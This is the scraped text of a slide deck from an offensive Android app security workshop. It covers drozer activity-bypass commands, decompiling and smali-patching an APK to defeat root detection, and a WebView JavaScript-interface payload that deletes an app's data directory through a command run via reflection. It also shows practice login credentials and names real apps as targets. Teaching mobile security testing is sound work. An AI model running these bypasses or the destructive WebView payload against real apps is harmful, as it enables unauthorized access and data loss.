Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Android mobile app security offensive security workshop

1,483 views

Published on

  • Be the first to comment

Android mobile app security offensive security workshop

  1. 1. WHO AM I Next Generation problem Solver Researcher & Reader in free time Speaker at  Facilitator at Weekend Testing Bug bounty Hunter  (eX .Crowd Tester) Reported Security Vulnerabilities for 50+ unique customers all over the world  including Apple, yahoo, Outlook, adobe & etc. Love to develop nasty code  & Hack it :) Works as Security Researcher  at   Certified Ethical Hacker  AKA. Bug Wrangler Null  & OWASP Co mmunity Accenture Digital Mobility
  2. 2. DISCLAIMER This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages.   Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly. Feel free to use this presentation for practice or education purpose. It's no way related to my employer - its my own research and  ideas.  ^ I hope - You gotcha ^
  3. 3.   HUMLA MEANS 'ATTACK' IN HINDI                         
  4. 4.  
  5. 5. SOCIAL MEDIA FEED Hashtag for this session      #NullHumla,  #MobileSecurity : Twitter handle for feedback :  @ @null0x00   Abhinav_Sejpal
  6. 6. ??? ~ WE AREN'T GOING TO DO THIS ~ So, feel free to stop when you have a doubt!  Are you Ready to Rock
  7. 7. Android Smartphone to IOT
  8. 8. The Mobile market is fragmented, stakeholders want their better cheaper faster mobile app - Correct?  What is if it's has Vulnerable code? WOW :D   - Yet to update the stats - 
  9. 9. ANDROID PACKAGE - APK
  10. 10. DEVELOPMENT PLAN
  11. 11. ANDROID ARCHITECTURE 
  12. 12. MY HOME IS YOUR APK 
  13. 13.  
  14. 14. OUR ARSENAL
  15. 15. PREREQUISITES CHECKS Genymotion Emulator Santoku Linux /  Appie / Android Tamer   Copy of Shared APK(s) : Here
  16. 16. DROZER FRAMEWORK INTRODUCTION Drozer Server Drozer Agent 
  17. 17. BYPASS THE ACTIVITY VALIDATION        run app.activity.start --component sh.whisper sh.whisper.WInboxActivity  
  18. 18. Self-Practice Session   Challenge 1 – Bypass the fix authorization for the whisper App 
  19. 19. nulltest2015@yahoo.in - Password!
  20. 20.  ADHOC  FORENSIC ANALYSIS 
  21. 21. Can we replicate this issue for the LinkedIn / Hike App ?
  22. 22. Linkedin Insecure data stroage
  23. 23. INSTALL THE BANK APP  Oh No - I can't use the App due to rooted device  :(
  24. 24.   Smali code Analysis  Step 1.  Reversing the APK to the JAR File (JavA file) dex2jar-2.0/ d2j-dex2jar.sh bank.apk
  25. 25. STEP 2   READ JAR USING JD-GUI jd-gui bank-dex2jar.jar
  26. 26. STEP 3 Reversing the apk to the smali code java -jar apktool_2.0.0.jar d bank.apk
  27. 27. 4. LOCATE THE CODE WHICH DETECTS THE ROOT 
  28. 28. 5. LOCATE SAME LOGIC IN JAR 
  29. 29. STEP 6. PREPARE LOGICAL PATCH We can't patch the Java code and get the binary  - We have to patch the smali code with new logic of   isRooted 
  30. 30. 7. NEW LOGIC IS AVAILABLE IN SMALI
  31. 31. 8. FIX THE SMALI CODE  9. Rebuild the binary 
  32. 32. 10. CREATE SELF-SIGNED CERTIFICATE  http://developer.android.com/tools/publishing/app- signing.html
  33. 33. 11. SIGN APK WITH JAR SIGNER    12. CHECK -  ROOT DETECTION * Updated apk has patched code *
  34. 34. ~  SUMMARY ~   Demo on Missing Root Detection - Done  Demo on Reversing the APK  -  Done Demo on rebuild the APK - Done  Demo on weak Binary - Done  Fix : Use the Dex Guard not the pro guard   Update the logical validation  - Done  Identify attack surface at Smali code - Done  Demo on Patch the Smali code - Done  Demo on APK signing - Done  Finally done the root detection bypass - Done 
  35. 35. ANDROID WEB-VIEW  Android allows apps to create a bridge in order to render HTML , javascript code  and allow interacting with the java codes of the application using   WebKit open source web browser engine 70 % of applications use WebViews  
  36. 36. THERE IS TWEAK WITH USAGE  DISABLE SUPPORT FOR JAVASCRIPT DISABLE SUPPORT FOR PLUGINS DISABLE FILE SYSTEM ACCESS  
  37. 37. WELL - HTTP VS HTTPS   WEBVIEW = NEW WEBVIEW(THIS);  WEBVIEW.GETSETTINGS().SETJAVASCRIPTENABLED(FALSE); 
  38. 38. IDENTIFY THE APP WITH THE WEBKIT - Reverse the binary - Find the webview  code  with  addJavascriptinterface  enabled  - Remember it's smali code - 
  39. 39.     IDENTIFY AND UNDERSTAND THE ACTIVITY WITH JAVASCRIPT ENABLE AT CLEAN JAVA CODE  
  40. 40. VERIFY NETWORK IS MALICIOUS ? HTTP VS  Vulnerable HTTPS VS  HTTPS  
  41. 41. Edit  the Response from cloud server   (Man In middle)
  42. 42. MALICIOUS JS VECTOR  <script> var path = ' /data/data/com.box.android/databases/---'; function execute(cmd){ document.write("WebView Vulnerability"); return window.Android.getClass().forName('java.lang.Runtime')  } execute([' /system/bin/rm', '-R', path]);  </script>
  43. 43. BOOM - COMMAND HAS EXECUTED SUCCESSFULLY 
  44. 44. BYPASS THE ACTIVITY  + API ATTACKS WITH VK APP
  45. 45. YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com Or  Tweet me at Abhinav_Sejpal
  46. 46. We need you! Attend Null Meets-up & give presentations. Share your ideas & leanings. Talk to our community champions. Your feedback helps us to build a good community. Looking forward for your ongoing support.   http://null.co.in/ Say 'Hello' @null0x00
  47. 47. ! THANK YOU !  @anantshri  @oldmanlab  @adi1391 @prateekg147 @5h1vang @exploitprotocol  #Nullblr Leads & Champions Big thank you to @null0x00, Satish, Apoorva & you All
  48. 48. LICENSE AND COPYRIGHTS copyrights 2015-2016  https://slides.com/abhinavsejpal/bangalore-android-null- humla/  Abhinav Sejpal -----   ( CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported   Dedicated to my lovely daddy

×